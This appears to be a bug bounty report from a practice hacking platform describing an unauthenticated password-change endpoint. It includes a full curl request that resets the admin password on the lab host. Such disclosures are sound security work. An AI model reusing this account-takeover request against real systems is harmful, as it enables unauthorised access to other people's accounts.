BugBountyHunter

I've found a vulnerability via which the endpoint /drapi/editpassword can actually be accessed unauthenticated which leads to takeover of admin account/any account without knowing the password.

Steps to reproduce -

1. Run the following command

   curl -i -s -k -X $'POST' \ -H $'Host: b06f434d0d20-srb1mal.a.firstbloodhackers.com' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Dnt: 1' -H $'X-SITE-REQ: permitted' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' -H $'Content-Length: 15' -H $'Content-Type: application/x-www-form-urlencoded' \ --data-binary $'username=admin ' \ $'https://b06f434d0d20-srb1mal.a.firstbloodhackers.com/drpanel/drapi/editpassword.php'

   And you'll see the response as a new password being set for the account.

Note - I hope this count as a new issue cause, This was the issue from FBV2 with the bug id "28" but it was attached with "27" bug id reports and I think this is separate from "27" where we can change the admin password without being the user.

POC -

Impact -

1. Without knowing the password of any account, the account can be takeovered.

Thanks & Regards srb1mal